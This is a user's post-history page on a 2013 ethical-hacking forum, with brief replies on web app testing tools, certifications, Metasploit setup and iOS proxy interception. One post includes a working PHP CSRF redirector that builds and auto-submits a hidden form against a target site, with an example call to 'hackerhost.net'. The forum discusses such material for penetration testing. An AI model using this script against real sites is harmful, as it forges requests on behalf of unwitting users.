Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.






Lost Password?
No account yet? Register
Who's Online
We have 41 guests online
 
Advertisement

You are here: Home
EH-Net
May 23, 2013, 01:32:45 PM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Go back to The Ethical Hacker Network Online Magazine Home Page
 
  Home Help Calendar Login Register  
  Show Posts
Pages: [1] 2
1  Ethical Hacking Discussions and Related Certifications / Mobile / Proxy Interception in iOS6.1 on: February 04, 2013, 03:59:46 AM
Does anyone face with the problem of proxy interception in iOS6.1?
After I upgraded to iOS6.1, the profile which I set with my self-signed certificate has not worked any longer.

Then I visited http://support.apple.com/kb/HT5642, and found the section:
"CVE-2013-0964 : Mark Dowd of Azimuth Security"

Do you have any idea to enable proxy interception in iOS6.1?
2  Ethical Hacking Discussions and Related Certifications / Other / Re: Worth 1 Yr subscription to Hakin9 ? on: November 22, 2012, 09:35:06 PM
Hakin9 is a hacking magazine. It is for you to update your knowledge, brush up your old experience and get more ideas and techniques from the industry.

If you would like to learn from the beginning, find good textbooks or good courses. After you are familiar with the topics, you could go further by subscribing Hakin9.

 
3  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: SOAP Web Services Vulnerability Scanner/Methodology on: November 19, 2012, 01:14:11 AM
Hello H1t M0nk3y,
from my experience, I used SoapUI to test web services. With the flexibility of input options the web service could use, I have never used an automated tool to test it. I think the result won't be good enough.
4  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: CSRF with XSS payload encoding help on: November 07, 2012, 01:57:59 AM
You could implement it by CSRF redirector technique.
I have posted here but the source code is unavailable.

http://pornsookk.wordpress.com/2011/07/08/csrf-redirector/

Code:
<html>
<title>PHP CSRF Redirector</title>
<body>
<?php
/*   Call
 *   http://hackerhost.net/csrf_redirect.php?csrf=http://vulnerable.net?username=john|passwd=12345 
 */
 
$csrf   $_GET['csrf'];
 
$tokens preg_split('/\?/',$csrf);
 
$url    $tokens[0];
 
$vars   preg_split('/\|/',$tokens[1]);
 print (
'<form name="csrfForm" method="post" action="' $url '">');
 for(
$i=0;$i<sizeof($vars);$i++)
 {  
/* $vars[$i]:  key=value;
     * key   = terms[0] 
 * value = terms[1]  
   */
    
$terms explode('=',$vars[$i]);
print('<input type="hidden" name="' $terms[0] . '" value="' $terms[1] . '" />');
 } 
//end for loop 
 
print("</form>"); 
?>

<script language="javascript" type="text/javascript">
  document.forms[0].submit();
</script>
</form>
</body>
</html>
5  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: Mapping the Application on: November 07, 2012, 01:49:43 AM
Quote
......have you had issues doing authenticated scans with w3af?

What does it mean? If you meant the problem, my w3af often crashed during the scan.
6  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: Mapping the Application on: November 06, 2012, 11:11:39 AM
For me, I am working with
1. BurpSuite for web application crawling and mapping.
2. DirBuster for directory or file name enumeration.
3. HTTrack for saving some web contents in order to extract interesting metadata.
4. nikto for checking web server configuration
5. w3af for quick web application scanning

These activities pave a way to the next step.
7  Ethical Hacking Discussions and Related Certifications / General Certification / Re: Certifications you need to have in order to be a Pen Tester. on: November 05, 2012, 08:28:38 PM
In the Asian region of the world, you will often need to be CEH certified. In the UK (England), you will need to be CREST and/or CHECK certified (sometimes both), and in Australia, you will need CREST in the near future if the current situation here evolves.

In the Asian region, the qualification which is often referred to is C|EH, but it's not mandatory. SANS or OSCP is not well known for HR. In several countries, you need to be their citizens as a prerequisite.   
8  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: problem on installing metasploit on: April 20, 2012, 10:15:55 AM
I agree with you. However, I did some search, I saw some tutorials that show metasploit on iOS.  lavender, did you see one of those?

As an aside note, BillV, that's cool.  Grin
9  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: problem on installing metasploit on: April 20, 2012, 01:53:29 AM
Well, I am not certain whether this can help you.
Basically, SET contains configuration file in set_config. You could point the reference to metasploit path in this file.

10  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: XSS protection in PHP on: April 20, 2012, 01:49:47 AM
A good brief tutorial on XSS protection in PHP.
http://shiflett.org/articles/cross-site-scripting
11  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: OWASP CSRFGuard on: April 17, 2012, 12:19:41 PM
l think implementing an anti-CSRF mechanism in our application is not difficult. You can turn on/off your mechanism at arbitrary points. Moreover, with java platform, if you use some frameworks like struts, you can use its built-in anti CSRF mechanism.

For CSRF guard, I have never used  Huh

 
12  Ethical Hacking Discussions and Related Certifications / General Certification / Re: Passed eLearnseurity course on: April 16, 2012, 09:20:33 PM
Hi Jamie, congratulations!!
Network certification is good for pentesting career.

13  Ethical Hacking Discussions and Related Certifications / Programming / Re: New to infosec - Python on: April 03, 2012, 10:07:04 PM
I would start with Counter Hack Reloaded, it will open your eyes.

I agree with cd1zz. Counter Hack Reloaded is great. If I could go back to the time I started in infosec, I would choose this one. Ed Skoudis is a great instructor.
14  Resources / Tools / Re: Backtrack 5 R2 on: April 03, 2012, 09:52:48 PM
1. Does SET-Social Engineering Toolkits work well on BT5r2? I have problem with its handler listening my meterpreter payload.
2. I noticed that in /pentest/exploits/, there was no framework3 directory.

Above all, I have installed BT5r2.  Grin
15  Ethical Hacking Discussions and Related Certifications / Other / Re: External Pen Testing Companies? on: March 14, 2012, 03:30:46 AM
In UK,
Portcullis Security
NCC Group
Pages: [1] 2
Powered by MySQL Powered by PHP Powered by SMF 1.1.18 | SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com
Valid XHTML 1.0! Valid CSS!
Page created in 0.083 seconds with 21 queries.
 
Exclusive Deal

sansfire13_245x90_cw90.jpg
SANSFIRE 2013
June 15 - 22

5% Off w/ Code: EHN_5

SANS Deals 4 EH-Netters
5% OFF Any SANS Course in Any Format!
Coupon Code: EHN_5 Including SANS Rocky Mountain 2013 & SANS Boston 2013
Polls
Compared to this year, 2013 will be:
 
Recent Forum Topics
EH-Net News Feeds
Latest Additions
 
         
Free Business and Tech Magazines and eBooks

© 2013 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.